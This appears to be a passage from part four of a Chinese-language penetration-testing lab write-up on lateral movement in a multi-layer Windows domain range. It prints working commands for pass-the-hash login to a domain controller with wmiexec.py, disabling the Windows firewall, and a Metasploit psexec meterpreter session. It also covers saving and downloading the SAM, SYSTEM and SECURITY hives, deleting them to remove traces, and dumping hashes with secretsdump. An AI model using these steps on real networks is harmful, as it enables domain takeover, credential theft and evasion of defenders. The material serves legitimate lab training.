从外网打点到内网横向渗透——多层网络域渗透项目总结( 四 )


文章插图
 
获取到的 hash 后利用 impacket 中的 wmiexec.py 脚本进行登录, 成功拿到 shell : python wmiexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e redteam.red/[email protected] -codec gbk .

从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
此时, 成功获取到了域控的 shell . 但是这个 shell 并不是稳定的, 真实环境中我们还需要进一步进行权限维持的操作, 在得到 hash 之后, 先利用前面获取到的 shell 关闭一下防火墙: netsh advfirewall set allprofiles state off , 接着便可以使用 PSEXEC 模块上线 MSF 并进行后续的操作了.
use exploit/windows/smb/psexecset SMBUser administratorset SMBPass aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880eset payload windows/x64/meterpreter/bind_tcpset rhost 10.10.10.8set lport 4446run
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
需要注意的是, 在做完权限维持后要及时恢复域控的密码, 不然域控会脱域.
我们先导出 SAM 中原来的 hash , 利用 MSF 的 shell 下载下来并及时删除, 清理痕迹.
reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.savedownload C:\sam.save C:\Users\95235\Desktop\sam.savedownload C:\security.save C:\Users\95235\Desktop\security.savedownload C:\system.save C:\Users\95235\Desktop\system.savedel /f sam.savedel /f system.savedel /f security.save
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 

从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 

从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
接着利用脚本 secretsdump.py 查看一下域控的 hash : python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL .
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
利用脚本 reinstall_original_pw.py 恢复 hash : python reinstall_original_pw.py OWA 10.10.10.8
f4044edaafbdca41a6e53d234c14ab9a .
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
最后利用空密码再次进行连接来验证是否恢复成功: python secretsdump.py redteam.red/[email protected] -just-dc -no-pass .
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
效果图
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
由于打过几次线下的 CFS 靶场, 使用 CS 感觉不佳, 本次打靶过程中就只使用了 MSF , 正好锻炼一下自己对于 MSF 各功能的使用, 打靶过程中的收获还是挺大的. 靶机附件里面也给出了一个靶场存在漏洞的说明, 感兴趣的师傅们也可以根据漏洞说明尝试一下其他的打法.
从外网打点到内网横向渗透——多层网络域渗透项目总结


推荐阅读